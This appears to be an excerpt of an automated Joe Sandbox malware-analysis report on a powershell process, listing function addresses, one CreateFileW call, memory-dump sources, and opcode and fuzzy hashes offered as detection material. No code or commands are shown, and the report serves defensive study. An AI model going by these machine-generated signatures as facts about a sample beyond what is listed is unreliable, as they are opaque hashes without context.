                                                        control_flow_graph 1176 7a6ef58-7a6f95c 1179 7a6f964-7a6f99f CreateFileW 1176->1179 1180 7a6f95e-7a6f961 1176->1180 1181 7a6f9a1-7a6f9a7 1179->1181 1182 7a6f9a8-7a6f9c5 1179->1182 1180->1179 1181->1182
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6F7A7,00000000,00000000,00000003,00000000,00000002), ref: 07A6F992
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430981240.0000000007A60000.00000040.00000001.sdmp, Offset: 07A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 3eb41861ecbe0f3af781794e2b0dfe3d7b52377a79f83b3b5aaa5a5f66281277
                                                        • Instruction ID: ab9bce5bba92b7c7b7d01f70ba5c4b65d514f2c78d9602eb8c705897c6358aa5
                                                        • Opcode Fuzzy Hash: 3eb41861ecbe0f3af781794e2b0dfe3d7b52377a79f83b3b5aaa5a5f66281277
                                                        • Instruction Fuzzy Hash: 102137B6D0065AAFCF10CF99D844ADEFBB4FB48310F04852AE928B7610D375A954CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A6F908, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1185 7a6f908-7a6f95c 1187 7a6f964-7a6f99f CreateFileW 1185->1187 1188 7a6f95e-7a6f961 1185->1188 1189 7a6f9a1-7a6f9a7 1187->1189 1190 7a6f9a8-7a6f9c5 1187->1190 1188->1187 1189->1190
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6F7A7,00000000,00000000,00000003,00000000,00000002), ref: 07A6F992
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430981240.0000000007A60000.00000040.00000001.sdmp, Offset: 07A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 7203f9b697bcc1c60938487d57ff2e11370fabce505a321a7e8e7742122292c2
                                                        • Instruction ID: b31abde09e1cd1a6851cce261403375ea4f33a54e9b6e48f960ff11eeb636a18
                                                        • Opcode Fuzzy Hash: 7203f9b697bcc1c60938487d57ff2e11370fabce505a321a7e8e7742122292c2
                                                        • Instruction Fuzzy Hash: B22148B6D0065AAFCF10CF99D844ADEBBF4FB48310F04851AE918A3610D3749910CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A392A1, Relevance: .6, Instructions: 564COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 929a7b0f231c130933056e7afa818c1ebe7277ebdb75d0019ccfc127d79eb654
                                                        • Instruction ID: fb8ee948045fbf7ed2e37ea81d002a2734289e698ba77d7b8030e683f1538154
                                                        • Opcode Fuzzy Hash: 929a7b0f231c130933056e7afa818c1ebe7277ebdb75d0019ccfc127d79eb654
                                                        • Instruction Fuzzy Hash: 3E7231B4A01629CFCB64CF28DD84B9AB7B1BB49315F1041EAE90DA7350EB356E85CF14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3873E, Relevance: .3, Instructions: 336COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbce7eeb4a4fdbe2a11a595f5506cd80027a27d46590a0c4d49f6fdf5308ee0f
                                                        • Instruction ID: 5b52f30bbc87e279a8759e763da3b35968533631be628eada54a64a255477832
                                                        • Opcode Fuzzy Hash: fbce7eeb4a4fdbe2a11a595f5506cd80027a27d46590a0c4d49f6fdf5308ee0f
                                                        • Instruction Fuzzy Hash: D8029EB4A01229CFDB65DF24C894B99B7B5BF89304F1081EAE509A7250EB34AFC5CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 08129C1E, Relevance: .3, Instructions: 325COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 50c348a97b6e04c19d2a81bb87d6bff3586f228c8536197715f397d530c46c93
                                                        • Instruction ID: 8bc864ef95737ce91feddb752e8bd2bd6da762dde3aeb4382396c8c060f89aea
                                                        • Opcode Fuzzy Hash: 50c348a97b6e04c19d2a81bb87d6bff3586f228c8536197715f397d530c46c93
                                                        • Instruction Fuzzy Hash: 6FD13879A00128DFCB25DFA4D989D9E7BB6EF8C311B214219E906A7325CB31ED51CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A32818, Relevance: .3, Instructions: 297COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f740df4b9868abb623139a4ceca04097c4f1c33600baaef95db08b8a3eb930eb
                                                        • Instruction ID: 1da5cccdbb3a748e1bd8ce05615a6d03f19b8f06da4ad8d5e09c579d107e719a
                                                        • Opcode Fuzzy Hash: f740df4b9868abb623139a4ceca04097c4f1c33600baaef95db08b8a3eb930eb
                                                        • Instruction Fuzzy Hash: D6B10474B006049FCB24DF69C854AAEBBB6FFC9310B1585A9E545CB3A2CB30EC01CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3CE78, Relevance: .3, Instructions: 257COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3c33419a60efcad3a66ec5877becedcc15eaea86f002c284b4771399a637289
                                                        • Instruction ID: f93e563342744da3067b86cb2fcc6f3eee1346443bbf35008561e271d878ff44
                                                        • Opcode Fuzzy Hash: f3c33419a60efcad3a66ec5877becedcc15eaea86f002c284b4771399a637289
                                                        • Instruction Fuzzy Hash: 3FA141302002428FCB55EFB4D4969DEB3E6EFC1208B149D38D1199F2A9DF71BD098BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3CE68, Relevance: .3, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b2866c6c9de884764fbce58e5d5fab576b53bff83aadd544cf90e79ac41ed65
                                                        • Instruction ID: 02ca41cf24f681f09dc6d5a0537b3d22c069cfda8a50cf994c340bf3f0f2fac7
                                                        • Opcode Fuzzy Hash: 3b2866c6c9de884764fbce58e5d5fab576b53bff83aadd544cf90e79ac41ed65
                                                        • Instruction Fuzzy Hash: C5A152302002418FCB55EFB4D4969DEB7E6EFC1208B149E39D1199F2AADF71BD098B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 08125A68, Relevance: .2, Instructions: 203COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d00af580e98761bf13912dced4e3f3d45c75ec23a8cc26fcb5e65eb5fc7947ed
                                                        • Instruction ID: 84a46db19de58ef6453bcc104dfb823b9456f0c4e376757a89e40b84b856a70f
                                                        • Opcode Fuzzy Hash: d00af580e98761bf13912dced4e3f3d45c75ec23a8cc26fcb5e65eb5fc7947ed
                                                        • Instruction Fuzzy Hash: 94817934A00659DBDB14DFA0C8847DEBBB6EF88304F248869D805AB384DF74AD45DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0812CB36, Relevance: .2, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a34d1007e9c1e7e3223d62b80d4da3ead99f7e3408c8154b38386fe78edeba8
                                                        • Instruction ID: 273ad1e920c0dec3cbec4a198181b9157c8e6b9a8d627019c2cbffafc6924d62
                                                        • Opcode Fuzzy Hash: 0a34d1007e9c1e7e3223d62b80d4da3ead99f7e3408c8154b38386fe78edeba8
                                                        • Instruction Fuzzy Hash: 2E71AF34700229DFCB21DFA4D484A9DBBB2EF84711F158929DA059B2A4CB71ED65CBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0812BAA0, Relevance: .2, Instructions: 173COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9b390475136d9d68e8c03fd1a2a64b45fa6db429711397edaba8772d8c1d4ece
                                                        • Instruction ID: e976f3dbe2e2bea21ddc1cb36032c99faeac6076196eb0ed4f13d9c345abcb4e
                                                        • Opcode Fuzzy Hash: 9b390475136d9d68e8c03fd1a2a64b45fa6db429711397edaba8772d8c1d4ece
                                                        • Instruction Fuzzy Hash: A2519F71204615DFC724DF75E8849AAB7F6FF84215B008E69D40A8B690DF31BD96CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0812A800, Relevance: .2, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0a6e8eb8236ed53e8c30e07864258a2395acfa3c82a68cf40f8a76fd2d71590
                                                        • Instruction ID: 51322efe06c7119aa7764ff0a86e3fbf822acf54428754047c4e54d71be91c74
                                                        • Opcode Fuzzy Hash: b0a6e8eb8236ed53e8c30e07864258a2395acfa3c82a68cf40f8a76fd2d71590
                                                        • Instruction Fuzzy Hash: 74519B35B00224DFDB14DF69D885BAE77E2EF88311F118479E906AB391CB71EC518BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3EC68, Relevance: .2, Instructions: 157COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f2ebf4689d629c8ffec524568b45da5e1b3c22b939faf7a8a5080a067eeddf5
                                                        • Instruction ID: b35b6a8ab2e013d0b11a1e674a3e8f859cc3cec90361b9f1d7eb082bb5eae0a8
                                                        • Opcode Fuzzy Hash: 1f2ebf4689d629c8ffec524568b45da5e1b3c22b939faf7a8a5080a067eeddf5
                                                        • Instruction Fuzzy Hash: 715190B0A04249EFDB04CFA5D854BEEBBF6AF89200F188129F815A7391DB34DD05CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0812B88F, Relevance: .1, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dec70061ea3aef60bec59aadd5f58ed94d2aa22706faa63cc7b86c6a0bec8a39
                                                        • Instruction ID: 4840074e4a585f65715dcda0166e12d747d65ddbbf5a5fe731eca31a9d35b96d
                                                        • Opcode Fuzzy Hash: dec70061ea3aef60bec59aadd5f58ed94d2aa22706faa63cc7b86c6a0bec8a39
                                                        • Instruction Fuzzy Hash: 8641F034A04214CFCF28DFB8D44879EBBF6EF84315F00486AE40597280DB34A955CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3EC59, Relevance: .1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: edb47452ffc23fb8fb46168c0741a7f6f2ad963c26a035fda6e5e9a8eeea6378
                                                        • Instruction ID: 84535fcfab1485fb3b5debd45e4a5b15eaa1c58823e36e8381cd1ba1f4036f91
                                                        • Opcode Fuzzy Hash: edb47452ffc23fb8fb46168c0741a7f6f2ad963c26a035fda6e5e9a8eeea6378
                                                        • Instruction Fuzzy Hash: EC518EB0A04249EFCB15CFA5D844BEEBFF6AF89200F188569F855A7391DB349D05CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3068C, Relevance: .1, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 824146d25d73bbabf853c924dae6f596fac7b4deed947527d44ee8da74214ee1
                                                        • Instruction ID: c7888607957dbb912c558479a15903b9d5df147d87bfcd15bba6daf122e96df9
                                                        • Opcode Fuzzy Hash: 824146d25d73bbabf853c924dae6f596fac7b4deed947527d44ee8da74214ee1
                                                        • Instruction Fuzzy Hash: 31510534A11209CFDB25DF34C954BA9B7B2FF85205F008AE9E4496B3A1DB75AE81CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A32B68, Relevance: .1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a501a9bec206acdb0a4f8eef00479272bf2db2eb369e2fa89564363d37cb44d
                                                        • Instruction ID: ae714546a024fdeff7cbf23cf1faa4e68e9dbf4fe9853bf54ebc1553f55973dd
                                                        • Opcode Fuzzy Hash: 5a501a9bec206acdb0a4f8eef00479272bf2db2eb369e2fa89564363d37cb44d
                                                        • Instruction Fuzzy Hash: 02419EB1305702CFC3299F2AD594A27B7B6BFC5211715896DE46A8B7A1CB31EC42CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A30F50, Relevance: .1, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce21a1cea457ed33b44f4b24c8c3dbf9762dab4fdc3413610f8d7c84c6a43790
                                                        • Instruction ID: d85f65d470fd15a4b82e6b4837b1a90e4d3310cac7b11370e25caea526d9a2cb
                                                        • Opcode Fuzzy Hash: ce21a1cea457ed33b44f4b24c8c3dbf9762dab4fdc3413610f8d7c84c6a43790
                                                        • Instruction Fuzzy Hash: C931D031B001458FCB149BA8D498AAF7BFBEFC5310F1540AAE505DB3A2DF749C018B62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A33CC0, Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ccec342d66a17017f61b9038f8b06bb83fd03a942a6549806f203bcfa29a63cc
                                                        • Instruction ID: b56985d57fed31599a36598753c1aababdd113c1b2785d1eec9df245eafd8e4c
                                                        • Opcode Fuzzy Hash: ccec342d66a17017f61b9038f8b06bb83fd03a942a6549806f203bcfa29a63cc
                                                        • Instruction Fuzzy Hash: F531DCB47002218FCB14EF39C954A6EB7E6AFC9684B104869E412DB3A0EF70DD058BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A308D2, Relevance: .1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c39952c73f84a18de6b1e73355ccd6ed1534a74f4cd35175de6279c5a21952c
                                                        • Instruction ID: 3e637ef6564a9ba0373dfbb01528a82e4f4721da2c4e7983423d3f9a0bf80900
                                                        • Opcode Fuzzy Hash: 4c39952c73f84a18de6b1e73355ccd6ed1534a74f4cd35175de6279c5a21952c
                                                        • Instruction Fuzzy Hash: 5A415970A01219CFEB65DF30D854B9AB7B2BF84305F1085E9E519AB390CB75AE85CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A30BE8, Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bbc05376b7b9b7c2acdb54c4de000cd73b49e5f9ec231698465eb3cf66c806e7
                                                        • Instruction ID: 8d4ef25dfe6983e155ee24f226569ab5c6da12132c5d4d8463836f1f67aba177
                                                        • Opcode Fuzzy Hash: bbc05376b7b9b7c2acdb54c4de000cd73b49e5f9ec231698465eb3cf66c806e7
                                                        • Instruction Fuzzy Hash: 663150B4B18B52CFC724DF2BC59092B77F6AB85211B404459F8AACBB61C7B4EC41CB84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A341E6, Relevance: .1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4803dcef7164b2a573e433aa739338c6a02402c006c44dbf5c8f9b4947aa8e10
                                                        • Instruction ID: ab905f2b45caa7b8b1e009625da95587892e176f63ca43debe7a8e0511feb49c
                                                        • Opcode Fuzzy Hash: 4803dcef7164b2a573e433aa739338c6a02402c006c44dbf5c8f9b4947aa8e10
                                                        • Instruction Fuzzy Hash: 813167B1A00359DFCF65DF68DC456EDBBB2AF89310F4081AAE409A3250DB358E84DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3E643, Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d18dcc23c550620c2f0fc88eab188dd235b02242a11ba2b4d78b167f0a6cab75
                                                        • Instruction ID: 0e88316aa2346908aa6d84ea5bb11afc5cb206e391277197f0659feffe3694e6
                                                        • Opcode Fuzzy Hash: d18dcc23c550620c2f0fc88eab188dd235b02242a11ba2b4d78b167f0a6cab75
                                                        • Instruction Fuzzy Hash: B1314375A00219DFCB11DFA0C944BEDBBB2BF89300F114598FA45AB261DB75AE80CF52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A30BD8, Relevance: .1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4f77dff0bcf15ac63453e229824b134b1c20444a3a309677427b604fcdabf70
                                                        • Instruction ID: 98f617ced00d68f0963bc68a5a8dd8b24aac29550412cb48ce57e6eb35319f8b
                                                        • Opcode Fuzzy Hash: d4f77dff0bcf15ac63453e229824b134b1c20444a3a309677427b604fcdabf70
                                                        • Instruction Fuzzy Hash: BD1193B4608B428FC724DF2BD590957BBF6AB86211B404459F4E98FB62C760EC40CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A3B279, Relevance: .1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0359d59f5113d1453ca8dbdc7ecdc8a6f3cc15bcef53f4bc3f7f900516116ae0
                                                        • Instruction ID: 338b076c6a495d52811608e13cb5db90286be923f8df52c1417ed5a38ffe774f
                                                        • Opcode Fuzzy Hash: 0359d59f5113d1453ca8dbdc7ecdc8a6f3cc15bcef53f4bc3f7f900516116ae0
                                                        • Instruction Fuzzy Hash: 66312975A00629CFCB249F34E84469CB772FF8A315F1085EAE51A67610DB39AEC5CF11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A30F38, Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 299d8ca069c02e1cda31b2dd583b0d47558d1916000bebcd3b8c07c85d03b444
                                                        • Instruction ID: c5c30f0f9772a5b548806849b8134fff39c2cb0e3dff2b528191dc2ce159149b
                                                        • Opcode Fuzzy Hash: 299d8ca069c02e1cda31b2dd583b0d47558d1916000bebcd3b8c07c85d03b444
                                                        • Instruction Fuzzy Hash: C711C1B27082455FC7119F69D48499B7FF6AFC6310B1B40EAE105DF2A2DA74EC40CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A308F0, Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bc1abc7fe23d4ec41c23b69dc8cb9a5c5c0f80f2d67e8cd94322aaa76dd687f
                                                        • Instruction ID: feb786819cfd25c129e66efd23efe8671cd614448203c86067ff9afeed4da520
                                                        • Opcode Fuzzy Hash: 4bc1abc7fe23d4ec41c23b69dc8cb9a5c5c0f80f2d67e8cd94322aaa76dd687f
                                                        • Instruction Fuzzy Hash: 0921D330A01119CFEB69CF74D854B99B7B2BF94205F2099E9E419AB3A1CB74ED81CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07A31010, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78f0b4abe2c4c4577fb7105bb4af382c196ee86d4e594978a2715b2857802e87
                                                        • Instruction ID: c7830108ff6cde40a909fa86c160c85dbaf51a384bb0a02c22e29ee6953aa378
                                                        • Opcode Fuzzy Hash: 78f0b4abe2c4c4577fb7105bb4af382c196ee86d4e594978a2715b2857802e87
                                                        • Instruction Fuzzy Hash: FC01DF32B001599FCB14EBB4989A6BF3BBBEBC8300F144469E205CB3A5EFB44D119791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00C9D005, Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.426120955.0000000000C9D000.00000040.00000001.sdmp, Offset: 00C9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_c9d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4b9e0a96e6588e4dfc63c39d8efe637b3c1365f6cab6102d9a84be9f2fded0d
                                                        • Instruction ID: 44470be93ba3b115e7e3d6d81ea4e4e578b5cf34cb100b377e14c669b88dbb00
                                                        • Opcode Fuzzy Hash: e4b9e0a96e6588e4dfc63c39d8efe637b3c1365f6cab6102d9a84be9f2fded0d
                                                        • Instruction Fuzzy Hash: 1C015E6140E3C05FDB128B258C98B52BFB4EF53224F1D80DBE8959F2A3D2695C48C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00C9D01D, Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.426120955.0000000000C9D000.00000040.00000001.sdmp, Offset: 00C9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_c9d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ae96ea927d66baf6c99b8d2be7a776c73976e9da97ecaf853fa7f9f175287ca
